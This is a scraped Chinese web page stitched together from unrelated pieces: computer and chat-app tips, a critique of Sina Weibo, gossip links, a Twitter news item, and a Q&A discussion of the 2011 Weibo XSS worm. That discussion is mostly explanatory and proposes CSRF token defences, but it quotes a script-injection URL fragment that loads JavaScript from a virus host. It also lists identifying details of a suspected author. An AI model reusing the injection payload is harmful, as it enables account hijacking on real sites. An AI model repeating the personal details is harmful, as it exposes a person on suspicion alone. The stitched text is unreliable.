您删除私信后，也只能删除您私信中的内容，但是对方私信中的内容还是存在的，所以对方仍然可以看到之前的私信。
win7系统的最近访问位置功能对于电脑只有自己一个人在用的人来说，是很有用的，而对于那些电脑多个人或者有时候别人会用的电脑来说。很容易暴露你的隐私，个人建议还是删掉这个功能。如果你每次下线都去手动删掉也行，但是太麻烦了。 1 比较简单的方法： 只要右击开始菜单，打开“任务栏和开始菜单属性/开始菜单”设置窗口，取消“隐私”小节中的两个项目，以后就不会再记忆最近访问的位置。 2 只弄第一步还不是很安全，两步结合起来才是完美的。 首先打开“自定义开始菜单”窗口，在这里取消“最近使用的项目”选项，确认之
如何发私信 1、给粉丝发私信：只需进入粉丝用户页面，点击上方发私信即可。 2、给非粉丝用户发私信，即对方没有关注您，则需满足对方的私信权限设置才可发送私信： 若此用户设置的是“所有人”，则任何人皆可给他发私信;若对方设置为“可信用户”可发私信，则新浪认证用户、微博达人、手机绑定用户以及身份验证用户可发私信;若用户设置的是“我关注的人”，那么只有他关注的对象才可给他发私信。 私信权限设置 设置谁可以给您发私信，您可以在帐号-帐号设置-隐私设置-通用的私信中设置所有人、可信用
之前用Win8系统时采用UEFI方式启动电脑，那时secure boot是关闭的。升级Win8.1并激活后桌面右下角secure boot未正确配置的水印居然还在。重启把secure boot开启发现无法进系统，这下不知道该如何解决这问题了。 解决方法 1、进入BIOS,找到secure boot mode 回车改为custom这时下面的选项就可以选了。 2、回车key msnagement，找到install all factory default keys回车，选YES再
电脑突然死机或者断电，硬盘数据丢失?U盘重要文件不小心删掉了? 电脑中毒,文件丢失或无法读取? 系统突然崩溃,重要文件丢失?使用计算机最怕的就是象以上这些突如其来的灾难性故障导致重要数据的丢失，误操作、计算机病毒的攻击和软、硬件故障等天灾人祸都在时刻威胁着数据文件的安全，因此如何保障计算机数据的安全完整成为人们日益关注的话题。 针对各种可能的威胁，我们可以通过防火墙、反病毒软件以及各式各样的数据备份软件来预防这些问题的发生，但是在数据丢失事故发生之后还需要一个能够帮助我们拯救数据的恢复工
很多用户在使用Win8系统时，会遇到应用商店莫名其妙丢失的问题。此前系统之家已经给出了一种解决方案，不过那是针对图标丢失而言。但有的用户应用商店是被优化软件删掉，该怎么找回呢?系统之家小编教你如何恢复被删掉的Win8应用商店。 在传统界面按快捷键Windows徽标键+X ，点击命令提示符(管理员)，输入“sfc /scannow，系统就会自动验证应用商店被损坏的文件，然后自动修复。 这样几步就恢复了被删除的Win8应用商店，是不是很容易呢?应用商店作为Win8一个很大的特色，还是
一不小心，删错了，还把回收站清空了，咋办啊?只要你还没进行磁盘清理，这边小编教你如何不用下载软件，就能轻松找回你删掉并清空回收站的东西。 1 、按win+R(win建就是ctrl跟Ait之间的那个键)，然后输入regedit点击确定(进入注册表编辑器)。 2 依次打开：HEKEY - LOCAL - MACHIME - SOFTWARE - microsoft - WINDOWS - CURRENTVERSION - EXPLORER - DESKTOP -NAMESPACE
1.打开“我的电脑”-“工具”-“文件夹选项”-“查看”-在“显示所有文件和文件夹”选项前打勾-“确定” 2.删除以下文件夹中的内容： x:Documents and Settings用户名Cookies下的所有文件(保留index文件) x:Documents and Settings用户名Local SettingsTemp下的所有文件(用户临时文件) x:Documents and Settings用户名LocalSettingsTemporaryInternet Fi
Word批注怎样删掉用户名 有时候Word在添加批注的时候，自己的姓名会出现，而人们却又想匿名注释。那么Word批注怎样删掉用户名?下面一起来看看操作方法。以下会非常全面的介绍，都有介绍，2007用户参考一下2010版的吧! Word2003删除方法 1、打开文档并添加批注后，找到工具——选项。 2、打开选项界面后，切换到”用户信息“进行设置。 3、然后将用户信息清空，最后确定，以后添加的时候就不会有了。 4、但是值得注意的一点是：Word2003对于之前编辑的就需要逐一修改
具体操作步骤如下： 1、在旁边一列输入公式=SUBSTITUTE(B2," ","")，按回车键 2、选中C2单元格，鼠标放在该单元格右下角，当出现+号时点住往下拉，一直到C20再松开。 3、用该公式可以去掉单元格中的空格字符。接着可以通过复制、选择性粘贴将新列中的结果返回原列中就可以了。 回顾之前的Excel运用查找替换法删掉单元格中空格符的方法
很多人担心自己的QQ各种隐私被窥窃，但是安装了QQ其实它自带的有些文件依然影响着安全问题，下面跟随小编一起删掉QQ自带这几个文件，有效保护个人隐私。 删掉QQ自带这几个文件 有效保护个人隐私
windows系统相信很多人都在用，而IE是windows系统默认的浏览器。但是IE默认的搜索引擎是bing。而正常情况下大家所使用的搜索引擎是百度。下面说下IE的搜索栏是在哪里。 1 win7IE搜索栏在哪里 看图我们就知道这个IE搜索栏了，但是很多人也许都没注意到它。大部分人也都没有用它的习惯。那么如何才能删掉它呢? 2 要删掉win7IE的搜索栏，需要更改组策略里面的设置。 想要进入组策略只需要开运行里面输入“gpedit.msc”，按下回车就进入了。 3 到了组策略里面依次定位到： “计
微信删除好友对方还能看到我的朋友圈吗?有很多朋友想知道删除某一个好友之后他还能不能看到我的朋友圈，下文将会告诉大家答案，有兴趣的朋友可以来了解一下。 如果你删除了对方，就代表对方不是你的好友，你的朋友圈里不会显示他的动态，他的朋友圈也不会显示你的。你的微信通讯录里没有对方的名字，但单方面删除的话，对方的通讯录里还是会有你的名字的。 微信里有三种情况: 1. 如果你删了对方，但对方没删你，那你去他主页可以看到他所有的照片; 2. 如果对方也删了你，那你去访问他的主页最多只显示他
随着微信的使用范围不断扩大，越来越多的朋友使用微信，经常会有人加好友，但如果你对他无好感，可以将其删除。在微信好友列表中删除了好友之后，那么对方列表有自己的名字吗? 你的微信通讯录里没有对方的名字，但单方面删除的话，对方的通讯录里还是会有你的名字的。 腾讯 微信里有三种情况: 1. 如果你删了对方，但对方没删你，那你去他主页可以看到他所有的照片; 2. 如果对方也删了你，那你去访问他的主页最多只显示他的十张照片(陌生人); 3. 如果对方删了你，你去访问他的主页不会显示任何一张照片，而且会出现一
发现某一好友好长时间都没没上线过了，是真的没上线，还是在他的好友列表里将我删了?有点疑惑，终于找到了一个方法，可以测试一下好友是真的没上线，还是将我“踢”了。 在好友列表中双击好友图像打开聊天窗口，单击QQ秀右上角的双箭头，打开QQ秀菜单，在打开的菜单中选择“和好友的QQ秀合影”(见图1)。 如果对方已经将你踢了的话，将会弹出“不是对方好友，不能进行合影”的提示(见图2)。反之，如果可以正常进入合影页面的话，说明还在好友的QQ好友列表中。不过需要注意的是，QQ很多功能都是要进行付费的，从大家熟知
进程文件： mcmnhdlr or mcmnhdlr.exe 进程名称： VSOCheckTask 进程类别：存在安全风险的进程 英文描述： mcmnhdlr.exe is vital process for McAfee SecurityCenter and Virusscan Online. Removing this process will dissable the automatic scanning. 中文参考： mcmnhdlr.exe是McAfee SecurityCenter安
Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE/SOFTWARE/Classes/Folder/shell/DeleteSVN]@="清除svn文件夹"[HKEY_LOCAL_MACHINE/SOFTWARE/Classes/Folder/shell/DeleteSVN/command]@="cmd.exe /k /"TITLE Removing SVN Folders in %1 && FOR /r /"%1/"
目前迅雷7没有恢复功能哦;
美图秀秀强大的修图功能让它成为了无数女生心目中的PS神器，操作简单效果又丝毫不逊于专业软件。不久之前美图秀秀又推出了旗下第二款主打美颜的手机—美图手机2，众网友惊呼，这下连后期修图都省了。不过美图秀秀可并没有放慢研发新功能的脚步，去雾功能清新上线，还你一片蔚蓝的天空。 美图秀秀新增去雾功能 北京的春天十分短暂，不少人都带着家人朋友去公园中留下那最美的回忆，不过近几年雾霾一直困扰着帝都人民，美丽的景色完全淹没在灰蒙蒙的空气中，再好的器材也拍不出干净透亮的色彩，美图秀秀推出的去雾功能就能解决
人逢喜事乐，月到中秋明，每年农历八月十五，就是中秋节。中秋节又称“团圆节”，早在唐时就正式成为节日，至今已有千余年历史，中秋节的传统活动便是一家团圆赏月、吃月饼。所以人们一直都喻中秋为最有人情味、最诗情画意的一个节日。但自从08年成为法定节假日后，中秋节对于年轻人来说又有了新的玩法。崇尚自由的我们当然会好好利用这个小长假来一场短途旅行，放松身心。 透过上图的人生日历我们可以看到连上周末，中秋假期有三天。这三天如何度过就让小编来告诉你吧。 “桂林风景异，秋似洛阳春”。唐朝宋之问的《始安秋日》是这样　　昨天我点开新浪微博之前，就在心里琢磨，好几天没有登录了这下说不定会有人@我或者私信我，点开的瞬间&郭敬明？没错，这就是郭敬明，橙色的大V，一半明媚一半忧伤的小四哥。想想自己太不应该了，上次主动见小四哥还是在8月8号成都万达影城小时代2的海报上，过了这么久，未曾蒙面的小四哥竟然会主动给我发私信，也不可能是所谓的微人脉，私信显示两条，还没点开就可以看到"愿风剪裁你生命里的尘埃"字样，再说了郭敬明先生估计不会使用微人脉。
　　难道是邀请函？说不准小四哥看中了我的外表让我出演个小时代3的男9号？哎呀，不敢想了，说不定明天就不用上班了，以后也不用抽7.5元一包的红塔山了。
　　我一口气喝了一瓶老酸奶压了压神，点开――
　　我TT都买了，你却说开个房间只是为了畅谈人生？面对这个落差太大的粉丝福利我果断输入"TD"，马上又收到了郭先生的另一条私信"您已成功退订，感谢您使用我的服务。"，我又输入了一条"不用谢"，结果"郭敬明"不理我了。"可恶"，我点了根红塔山想："小时代3的男9号的角色梦想破碎了。"
　　新浪微博的流量变现是以牺牲用户体验作为代价
　　这是年底了要冲kpi的节奏磨？这样会对用户心脏不太好，我自己排了一下新浪微博最近的那些频繁的骚扰提醒的功能：
　　1、微人脉。我的最近的私信通知的前5条中4条微人脉（另外一条就是郭先生昨天发给我的），这些人的提醒我基本都不认识，有的关注过而已。
　　2、我发现你的微博中提到了"王二麻子"，"王二麻子"已开通微博&&
　　3、你好，今天是你的达人好友"李四豆腐"的生日&&
　　4、各种淘宝链接&&（在主信息流，第一条评论，还有尾部大banner&&）
　　5、&&（欢迎在评论里面补充）
　　每次新浪微博的更新版本鲜有亮点功能出现，却越来越多的给用户的骚扰，无论是端还是web版。面向企业的广告投放工具"粉丝通"，面向电商导购工具"新浪橱窗"，两者都会在用户的信息流中强行插入广告。引来的一片骂声丝毫不会干扰新浪微博的脚步，微人脉出现的直接几乎"枪毙"了用户的微博私信。
　　新浪微博一些本身具有优势的功能也逐渐成为鸡肋
　　新浪微群，去年的时候我感觉还有些活跃度，不过却是互粉群。今年新浪微群似乎已经销声匿迹。
　　新浪微盘，虽然上线的时候有些磕磕绊绊，但是在新浪微博上那段我最活跃的时间里，我真的喜欢上了微盘，很多资料也会在新浪微盘里面搜索到，也会看到一些关注的好友分享的来资料，不过现在腾讯微云体验越来越好，新浪微盘却很久不再打开。
　　开放平台，很多应用支持微博授权登录，就连我现在使用的搜狐新闻自媒体平台都将新浪微博的登录入口放在OpenID账户列表第一个位置。在开放平台的成功案例上面摆放着啪啪、虾米、音悦台等，显示最成功的的啪啪更是达到了770万以上的用户授权。可是这个优势如果用户都不在微博活跃了，这个国内最成功的的OpenID又有何用呢？我想应该不会在用户确认授权的时候需要先浏览几个淘宝广告吧？
　　微博Page，传说中的公共主页+LBS+服务推荐，传说中的"让微博的商业化终于落地"？别傻了，先别说功能和体验了，这个发布的时候用户都已经活跃在微信里了。
　　想变成Twitter+FaceBook+LinkedIn却成了真正的淘"江湖"
　　在微博最辉煌的2011年，曹国伟面对《华尔街日报》采访时描绘了新浪微博的宏伟蓝图――"会加设更多与Facebook类似的功能"，从此新浪微博变成了二者的杂交产物。
　　今年3月，内测了很久的微人脉正式上线，新浪微博又成为了Twitter+FaceBook+LinkedIn三者杂交的产物，不过最终哪一个基因都没有遗产好，成了三不像。
　　在今年 4 月，曹国伟先生在宣布新浪和阿里即将达成战略合作的微博里有这样一句话："微博目前是一个社会化的媒体平台，未来也可以同时成为一个社会化的商务平台，那才是一个真正的生态圈。"这次曹先生说对了，不过只对了前半句，微博确实变成了社会化商务平台，却没有形成生态圈。
　　战略投资微米的背后，继续社交还是彻底缴械？
　　今年10月，在易信、来往跟微信大战的火热的时候，新浪微博基金公开宣称战略投资移动群组社交产品微米，新浪任命集团副总裁、新浪微博创始人彭少彬出任微米的执行董事兼CEO，凸显对微米的重视。一直关注应用分发领域的我也陆续从朋友口中得知，微米接下来在推广方面有大预算。
　　微米联合创始人刘皇甫表示，微米要做的不是第二个微信，单纯的复制微信必死无疑。微米要做的是基于移动通讯架构上的群组社交，通讯只是为了更好满足社交需求的基础功能。这是跟马云做的配合车轮战吗？
　　当然了打造好微米确实是一个方向，不过我想这也许是新浪微博在社交领域最后的机会了吧，如果不行，我倒建议新浪微博跟一淘和淘江湖合并了吧，全力打造淘江湖2.0，一定会给用户带来全新的体验。至于那些逐渐离去的用户，算了吧，反正他们都是要走，还不如直接送他们走，扭扭捏捏耽误了时机。这句话很腹黑。
　　结语&祝福：
　　其实一直很感谢新浪微博，就像同样感谢人人网一样，你们这一两年每一次改版都没有改出亮点，这也是含有一种"恨铁不成钢"的舍不得。人人网陪我度过了大学四年，工作的前两年微博为初入职场的我带来了不少欢乐，为何不能在流量变现上再精细化、再慎重一点，由衷的感谢并祝福下一次改版能够得更好。
　　其实面临同样问题的不仅仅是微博，还是那个传说在闷声变现的QQ空间，但是相对来说QQ空间在功能和体验上处理的不错，下一篇计划跟大伙聊一聊QQ空间。
(责任编辑：张钰靖)
&&&&&&</div
主演：黄晓明/陈乔恩/乔任梁/谢君豪/吕佳容/戚迹
主演：陈晓/陈妍希/张馨予/杨明娜/毛晓彤/孙耀琦
主演：陈键锋/李依晓/张迪/郑亦桐/张明明/何彦霓
主演：尚格?云顿/乔?弗拉尼甘/Bianca Bree
主演：艾斯?库珀/ 查宁?塔图姆/ 乔纳?希尔
baby14岁写真曝光
李冰冰向成龙撒娇争宠
李湘遭闺蜜曝光旧爱
美女模特教老板走秀
曝搬砖男神奇葩择偶观
柳岩被迫成赚钱工具
大屁小P虐心恋
匆匆那年大结局
乔杉遭粉丝骚扰
男闺蜜的尴尬初夜
社区热帖推荐
用镜头记录下他们的生活……[]
客服热线：86-10-
客服邮箱：小鸟微博正式取消私信140个字符限制 - 每日邮报 Daily Mail China
据外媒报道，当地时间8月12日，正式宣布取消私信的140个字符限制。并将私信的字数限制增加到一万个字符，也就是说，Twitter的私信接下来就会像其他的聊天软件一样，用户可以用它跟好友畅通无阻地聊天了。随后，iOS、Android、网页、桌面版的Twitter均将获得更新。据悉，Twitter早在今年6月就公布了该计划，其主要目的是为了让Twitter覆盖更广是市场，挽救不断降低的用户活跃度。7月28日，Twitter公布了第二季度财报，虽然营收好于分析师预期，达到了5.02亿美元，但该公司正面临严重的用户活跃度问题。上星期，Twitter方面发布了公报，称用户增长量已经降至2013年上线以来的最低点。财报发布之后，已经有多名高管从Twitter离职，并示了对公司发展的不满。当然，Twitter页面的推文依然会被限制在140个字符之内，这也是Twitter上线之初吸引人的卖点所在，并成功开拓了“”类社交网站的市场。 （）报道，任何个人或者网站不得以任何方式复制或者转载，本站将保留追诉的权利。
每日邮报中文网 Daily Mail China 是中国首家以编译方式传递资讯的专业性网站，也是一种知识性很强的资讯报站。网站主题明确，节奏快捷，主要报道国内外新闻、新鲜事、体育新闻、娱乐八卦、科技资讯、摄影图片、社交新闻以及健康科研等内容。
加入我们 每日邮报如同一个初生的婴儿，现在需要有共同愿景的同仁们共同哺育，期待您的加入。 联系我们地址：福建省南平市邮箱：新浪微博出现类似病毒爆发的情况，是怎么回事？
2011 年 6 月 28 日
按投票排序
XSS代码：.病毒地址.cn/images/t.js%3e%3c/script%3e?type=update新浪名人堂部分XSS过滤不严攻击原理分析：源 .js 文件内容：
（海均提供）========================================病毒作者微博
（已河蟹）遗照 Domain Name: Registrant Organization: 北京新网数码信息技术有限公司Registrant Name: 张志 Administrative Email: 疑似病毒作者信息：I D名：lin5-61真实姓名：朝森性别：男毕业院校及专业：武汉科技大学职业：写代码（JAVA）联系方式：QQQQ空间：
问题：我是哪里人？回答：海南。
我去的时候晚了，没有弄到原始的脚本（伤心）[Update 1: 已经通过其他途径获得]，只能根据这个截图分析：1. 他（暂定认为是他，而不是她）是怎么嵌入脚本的？关键在于新浪微博名人堂的XSS漏洞，我们把病毒连接URL decode一下就看出来：这个脚本被执行了：问题在于新浪，一般来说这样的网址会被载入404页面，而这个网址的结果是脚本被执行了，应该是被嵌入了脚本。这种攻击是反射型XSS，我猜是「名人堂」页面的JS脚本写的不够安全，导致恶意脚本被被载入了页面。[Update 4]看到了这个截图，终于明白是如何嵌入的了，新浪的过滤太松了：2. 他是如何发私信，发微博的？(以下基本上是CSRF的解释)有人说攻击者很厉害，因为既能发私信，又能发微博，还能Follow。但其实最难的地方，在于如何执行那个脚本，因为一旦那个页面可移植性脚本，其他的就好做了，我们简单分析原理：1) 所有的攻击原理都是背后偷偷执行Ajax，通过仿造提交Form来完成发布微博等等。2) 但这也有一个问题，就是Ajax的跨域，由于Ajax的same domain的要求，无法跨域名执行脚本，他最厉害的地方在于，在微博中植入了这个脚本，这样就伪造了same domain，可以执行所有的Ajax。以上可以通过post()这个函数看出来，很简单的XHR调用，并没有使用cross domain的技巧。3) 发微博：publish()，向通过Ajax提交数据，由于大家都是登陆的，所以服务器端session还在，直接就可以成功发布微博。4) 关注：其实也一样原理。5) 发私信：发私信多了一个步骤，获取粉丝的user id。其中的关键函数getappkey()我看不到是怎么写的，可能就是从页面暴力扒取所有的user id，或者通过API获取到粉丝信息，前者可能性更大一些[Update 1: 看到代码了，是前一种]。获取之后然后通过一个for loop发送。3. 这和新浪的开放品台有关吗？ 简单的说：没关系（至少根据我看到的代码，希望有人提供完整的代码）。这次攻击的关键部分显然不是通过API进行的，虽然API可能被用来辅助。不过API本身很有可能被用来做坏事（比如用了某个应用，偷偷关注一个人），但是这次是通过嵌入脚本，根本没有必要走远路去走API，况且API已经默认禁止了私信端口。Update 1:朋友给了我原始代码，我看了一下，getappkey是通过“暴力”的方式得到user id的，与API无关。Update 2:hellosamy这不是一个简单的昵称，samy是非常有名的通过Social Network的XSS攻击传播的病毒，一开始在MySpace上面进行传播。说明攻击者对于网络安全领域有一定的功力（有点废话，能做到的必然很厉害），攻击方式和人人网的攻击有些区别，人人网是因为对于私信没有严格的strip tags，所以只要打开私信就会「中毒」，更严重。这次攻击如果打开私信是没问题的，如果警觉的话，不去点击那个链接，是没问题的。严重程度稍微低于人人网的攻击。Update 3:新浪应该如何防范呢？XSS我就不说了，因为我也没弄懂脚本如何植入的(见上)，但是即使植入脚本，新浪也可以防范，就是通过在所有的Form submission加入一个Token (hidden input)，这个Token应该根据每个用户hash出不同的ID，然后提交的时候验证这个ID。
我观察到的现象是：一些牛逼的账号（如@冷笑话精选、@techweb 等）都在首页发出了莫名其妙的信息。我在短时间内收到 20 多条私信，链接都是：
这个页面，其中有
被执行了。会影响到新浪微博的评论、翻页等基本功能。涉及攻击包括加关注、发微博、发私信等功能。新浪微博pm说：基本定位了这次攻击的原因，微博广场页面
有XSS漏洞，被植入了恶意JS脚本。初步发现 Chrome 和 Safari 都没中招。IE、Firefox未能幸免。有人简单分析了攻击的原理：
楼上几个回答的人你们研究js文件是没有任何意义的，因为那些不过只是很简单的js调用新浪微博功能的代码而已。28日的XSS是因为名人堂功能有字段过滤不严而造成的。名人堂功能对部分内容没有进行strip tags，导致可以嵌入脚本行程反射性的XSS。首先在知乎再次声明：此事太多人问我是不是我干的，我的回答是自从6月初我所在的网络已经被墙奸了，我不可能在这个情况下去挖掘XSS， 何况这种体力活我本人早就不做了。我的初步分析是这样的（扫盲言论）：新浪微博在前端一定是有验证机制，但是使用firebug可以跳过前端的验证提交不该有的代码。那么在挖掘的时候就可以使用curl模拟一下而完全无视前端的验证。所以js上的验证是防君子不防小人的。但是通常新浪后端必须要对字符进行进一步的过滤，包括url的encode decode， 各种加密，以及strip tags。没有过滤好的话就可以造成一个特殊的url形成XSS漏洞。此次名人堂有过滤不严（很可能是图片相关）导致某个表单在提交之后结果页面上可以被嵌入脚本。 也就是说你执行某个url的时候自然就提交了一个脚本并执行了起来。我有研究过这个东西是否可变持久性，结果是在牺牲传播性上是完全有可能的。也就是说此次用反射性进行传播是一个不是非常高明的做法，其效果远不如使用钓鱼将其变为持久层而逐渐获取大量名人的新浪公共ID。 此次行为如果包装得精致一点，可以套嵌和模拟一个登陆窗口出现，让用户以为是第三方应用而”再次登陆“新浪微博。所以此次做法属于一个很有天分的新人所为。
系统存在xss漏洞，被利用来放了xss蠕虫，就这么简单。
百度hi、Facebook都曾被XSS蠕虫攻击。解救之道在
新浪微博突然出现大范围“中毒”，大量用户自动发送“建党大业中穿帮的地方”、“个税起征点有望提到4000”、“郭美美事件的一些未注意到的细节”、“3D肉团团高清普通话版种子”等带链接的微博与私信，并自动关注一位名为hellosamy的用户。新浪hellosamy蠕虫的传播与细节：
昨天新浪微博被跨站攻击的原理：链接中写JS，很有趣的方法
xss和 5.1校内漏洞差不多。。。。 都是利用了过滤不严格。
具体啥情况，不太清楚啊。